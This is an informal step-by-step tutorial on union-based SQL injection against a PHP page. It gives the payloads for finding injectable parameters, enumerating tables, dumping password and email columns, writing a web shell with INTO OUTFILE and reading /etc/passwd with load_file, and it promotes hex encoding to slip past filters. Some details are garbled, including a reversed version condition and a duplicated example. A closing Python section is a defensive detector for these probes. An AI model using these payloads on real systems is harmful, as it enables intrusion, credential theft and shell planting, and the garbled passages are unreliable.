— SQL Injection //
Definition: SQL injection is commonly used to steal cached databases; from there, you can use Base64 values to write a shell via INTO OUTFILE, or you can use load_file to read files from directories (/etc/passwd for example).
Starting off, we need to use a single quote (') to make our error show up:
localhost/index.php?id='1
Be sure the number you're attaching your ' to has correct values and input parameters.
If you get an error similar to:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "/" at line 1
Then that's usually a sign of protection. What you need to do now is find out the number of columns; you can do this by using the ORDER BY statement in MySQL:
localhost/index.php?page=-1 ORDER BY 1-- No Error
localhost/index.php?page=-1 ORDER BY 2-- No Error
localhost/index.php?page=-1 ORDER BY 3-- No Error
localhost/index.php?page=-1 ORDER BY 4-- No Error
localhost/index.php?page=-1 ORDER BY 5-- Error!
This means the number of columns is 4 (because ORDER BY 5 outputs an error).
Now we need to find the accessible columns; we can do this by using the UNION ALL SELECT statement:
localhost/index.php?page=-1 UNION ALL SELECT 1,2,3,4--
Now you should get a clear response with the results; if you don't, try viewing the page source or hovering over images to be sure the result wasn't inserted there.
Accessible Columns : 2, 1, 3
Now we need to find out the version; we can use column 2, 1 or 3 to identify this. In this case we will be reading from column 3:
localhost/index.php?page=-1 UNION SELECT 1,@@version,3,4--
The output was 5.0.77. Version >5 = vulnerable; we can use information_schema to get the table information. If it's running >4, you might have to brute force the table names.
Now we need to identify all the tables. We can do this by using group_concat to return the strings, or you can just use table_name to get all the entries back. In our case we are going to use a simple table_name to retrieve our results; this tells the database to grab all table_names from information_schema. With group_concat it would be nearly the same, only slightly different.
localhost/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables--
Now you should get a response with all the table names. After this we could simply use a syntax such as: -1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables where table_schema=dbname-- but if we did that, we would have to guess the columns; instead we could use ASCII and char to broaden our attack and get the columns listed as well. An example (using the text dbname):
localhost/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables where table_schema=char(100,98,110,97,109,101)--
100, 98, 110, 97, 109 and 101 are the ASCII codes of dbname; when using text-conversion tools, be sure to remove the *'s, ;'s, etc.
Now we should get a response with the columns in the table we selected. For example, let's say it was this:
user_pass
email
msn
aim
To take advantage of this and read from the column, use this:
localhost/index.php?page=-1 UNION ALL SELECT 1,concat(user_pass,0x3a,email),3,4 from dbname
We use concat to return the strings, with 0x3a (which decodes as :) as the separator; this is useful if you are in quite large databases.
SQL Injection — Part 2
If you want to get a shell up in public_html/root directory/~www, you can do it using the "INTO OUTFILE" statement in MySQL:
localhost/index.php?page=-1 union select 'BASE64 VALUE' INTO OUTFILE 'prime location'
We have to include a base64/ASCII encoded shell in the "BASE64 VALUE" section; there are custom-made shells for this you can find online. And "prime location" should be replaced with the path where you want the file to be written.
This only works if you have FILE permission though.
SQL Injection — Part 3
If you want to gather information from dirs/files, you can use the load_file statement. Example:
localhost/index.php?page=-1+union+all+select+1,load_file(0x2F6574632F706173737764),3,4+from+mysql.user--
You have to have access to mysql.user, magic_quotes has to be off, and you have to know the path.
You could also try accessing the file via its hex value:
localhost/index.php?page=-1+union+all+select+1,load_file(0x2F6574632F706173737764),3,4+from+mysql.user--
Hex values/ASCII codes help bypass a lot of filters most webmasters have set!
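From the defender's side, that last point is exactly why a filter that matches raw request text misses these probes: the detection has to decode MySQL 0x.. and char(..) literals before matching. The following is an added example, not part of the original tutorial, that normalizes URL query strings and labels which stage of the technique described above they carry; the sample requests are constructed from the probes on this page plus one benign request, and the signature names are my own labels.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request paths (not from a real log), mirroring the
# probes shown in the tutorial above plus one benign request.
SAMPLE_REQUESTS = [
    "/index.php?id='1",
    "/index.php?page=-1 ORDER BY 5--",
    "/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables"
    " where table_schema=char(100,98,110,97,109,101)--",
    "/index.php?page=-1+union+all+select+1,load_file(0x2F6574632F706173737764),3,4+from+mysql.user--",
    "/index.php?page=-1 union select 'BASE64 VALUE' INTO OUTFILE 'prime location'",
    "/index.php?page=42",
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
CHAR_CALL = re.compile(r"\bchar\(([\d\s,]+)\)", re.IGNORECASE)

def _decode_hex(m):
    digits = m.group(1)
    if len(digits) % 2:  # odd length is not a byte string; leave it untouched
        return m.group(0)
    return bytes.fromhex(digits).decode("latin-1")

def _decode_char(m):
    # char(100,98,...) -> the characters those code points spell
    return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())

def normalize(query: str) -> str:
    """URL-decode, then rewrite 0x.. and char(..) literals to the text they encode."""
    text = unquote_plus(query)
    text = HEX_LITERAL.sub(_decode_hex, text)
    return CHAR_CALL.sub(_decode_char, text)

# Signature names are my own labels for the stages described in the text.
SIGNATURES = {
    "quote probe": re.compile(r"=\s*'\d"),
    "column-count probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-based extraction": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\b", re.I),
    "file read": re.compile(r"\bload_file\s*\(", re.I),
    "file write": re.compile(r"\binto\s+outfile\b", re.I),
}

def classify(query: str) -> list:
    """Return the signature names that match the normalized query (empty if clean)."""
    text = normalize(query)
    return [name for name, pat in SIGNATURES.items() if pat.search(text)]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{classify(req) or ['clean']}  <-  {req}")
```

Run over the samples, the hex-encoded load_file request decodes to load_file(/etc/passwd) and the char() request to table_schema=dbname before matching, so the encoding no longer hides them; the benign request matches nothing.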